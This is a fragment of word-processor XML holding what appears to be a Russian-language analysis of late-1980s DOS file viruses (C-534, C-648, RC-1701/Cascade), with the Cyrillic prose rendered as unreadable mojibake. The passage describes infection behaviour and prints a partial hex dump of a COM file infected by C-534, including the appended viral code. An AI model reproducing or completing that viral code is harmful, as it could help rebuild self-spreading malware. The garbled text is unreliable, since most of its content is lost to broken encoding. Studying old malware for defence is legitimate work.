        <w:t>-����� � ⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饬 � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>୥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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>OMMAND.COM. �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� � �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 � �����६���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� � ���� �� ���� COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� 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 �� ⥫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �� �⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>534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 xml:space="preserve">ᮧ�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">(����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭨���� ��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 � ��-�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>訡�� � ⥪�� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭�������� ���;  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢�����  13 (0Dh) �����).  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ������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ࠧ��� ��ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- 256 ���⮢ (100h), ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨬ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>64� (FA00h).  �� ����⪥ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢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 ����� ��᫥���� ��� ����䨪�樨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  �᫨ ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠢ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>0Dh (13-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),  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ����� ��⮤ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।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୮�� ��ࠦ���� ���� ��ਠ�⮬ ��⮤�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮������� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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" ����� �-648 � ⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  �� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㭤 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648,  �����  C-534 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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㭨�⮦���� 䠩� �� ���饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � � �⮬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥 �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筮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� ����樮���� ��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protect error writing device &lt;���.���.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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, Retry, Ignore, F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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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㦥� �  ����� � ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1988 ����.  � ����� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ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 xml:space="preserve">쭮  �  �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1989  ����.  ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣��   ���   ������� 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࠭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>塞� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯫ�⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ����⭮ �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.�.�����᪮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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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⮤� ����� ��������� ��⮤�� ����� �� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648.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ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪠����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠡�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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY0400.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C-5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0   E9 8D 01 90 90 90 90 90 90 90 90 90 90 90 90 90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   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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      ��᫥���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப� ������� �।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70   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90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0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3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0   50 BE F5 03 8B D6 81 C6 00 00 FC B9 03 00 BF 00  P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0   01 F3 A4 8B FA B4 30 CD 21 3C 00 75 03 E9 3F 01  ......0.!&lt;.u..?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B0   BA 2C 00 03 D7 8B DA B4 1A CD 21 BD 00 00 8B D7  .,........!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C0   81 C2 07 00 B9 03 00 B4 4E CD 21 E9 04 00 B4 4F  ........N.!....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... ... ... ... ... ... ... ... ... ... ... ... ... ... ..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E0   00 43 8B 8D 22 00 CD 21 BA 80 00 B4 1A CD 21 58  .C.."..!......!X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>03F0   BF 00 01 57 C3 EB FE 90 E9 8D 01 5C 3F 3F 3F 3F  ...W.......\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0   3F 3F 3F 3F 2E 43 4F 4D 00 54 52 59 30 2E 43 4F  ????.COM.TRY0.CO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0   4D 00 4D 00 00 00 00 20 00 E4 81 24 00 00 00 00  M.M.... ...$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20   00 07 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 03 09 00  ..????????CO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30   00 00 46 51 0F 09 20 E4 81 24 00 90 01 00 00 54  ..FQ.. ..$.....T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0   52 59 30 2E 43 4F 4D 00 4D 00 00 00 6F 73 6F 66  RY0.COM.M...os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450   74 79 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66  tyright Micros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460   74 79 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66  tyright Micros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470   74 79 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66  tyright Micros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480   74 79 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66  tyright Micros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490   74 79 72 69 67 68 74 20 4D 69 63 72 6F 73 6F 66  tyright Micros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.2. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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 xml:space="preserve">㯯�   ���� ��砫�  � �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>R�-1701 �  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 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砥� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ  � ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">浪�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1700 ���⮢ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騥  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㠫��  ��䥪�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"��������"  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢  ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮   �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⭮ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ⨯�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM, ������ ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫  㯮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⠬��� �������⭮ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ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. ������ ����� R�-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etterFall - �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>; Cascade - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>窠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 xml:space="preserve">,  ��  ��������,  ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>த���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫쭨��� ��㯯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易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �� ��⥬� �� ��।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稭����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"�������" �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪢 � ���孨� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப �࠭� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮯ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஬��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騬 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢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>1701 (6�5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ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">쭮 �����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">R�-1701  - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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⨯� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㭪樮����� �� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稭�� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2.0 (� 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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ઠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮡ�������� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(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᪮� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饩�� ⮫쪮 �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ய�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>8088/8086)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�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">設�� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>PC/AT � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�� � ��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386. ���⥣�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>- �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪥ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� �믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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ࠦ�����  ������⭮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭠�  �����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �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03 (F93Bh)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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-648, ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>R�-1701  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠢��� � ���� �� ���� COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩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室� �� ⥫�  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ��  �⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��  㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ��  ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.   ��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-648,  �����   RC-1701 ��  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室���� ��  ��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(����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦠���� �� �믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥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⠥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮�����  ������  �� ���饭���   ��  �����   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⮬ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樮���� ��⥬� �뤠��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protect error writing device &lt;���.���.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ன�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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, Retry, Ignore, F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䥪� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� ��� �����㦥��� ������� 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㣨�  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������� ����ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮��� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設� ����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㧨�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥�� �ᥣ�� �ਢ���� �  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤠�  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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � � �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 㪠�뢠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ������� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ���짮��⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> �� ��� �।�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⪥ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢨�, � ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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堭��� �㭪樮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ������� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥���  �⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥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-648. � ��⭮��, ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ᮧ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � ���� �� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬� ⮣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BIOS ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-����⮢�⥫� ��� ⮣�, �⮡� � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥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�� ���� IBM, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ� ��।��� �ࠢ����� ��ࠦ����� �ணࠬ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��  ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਧ����� ��⨢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ��������,  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᠭ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>権 � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஭� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� ������⢥���� ��� ��� IBM.  ������ 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ࠬ��஢���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ન ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭� �訡��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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 xml:space="preserve">᪥ ��ࠦ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">R�-1701 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢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 xml:space="preserve">㦥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭠� ����� ������� ����� � ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>21-4B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FF (�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㥬�� � ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DOS 3.3 � ����).  �᫨ ���,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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1Ch,  21h � 28h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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪥ �� �ணࠬ�� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ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���� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠���� �ணࠬ�� ��ࠦ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �᫨ ���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ࠦ��� ������ �ணࠬ�� �� ��᪥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������� �� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� � ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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 xml:space="preserve">.  ��⥬ � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ��������� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3 ���� (�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࣠������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室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� ⥫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믮������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ�����  �ணࠬ�� �ࠢ����� �������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>JMP (�9h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 �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 ��������� ����� 㧭��� ����� ��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䠩�� � �᪮����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ⥫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��⥬ ����� ����⠭�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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� ���� �� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�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  ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
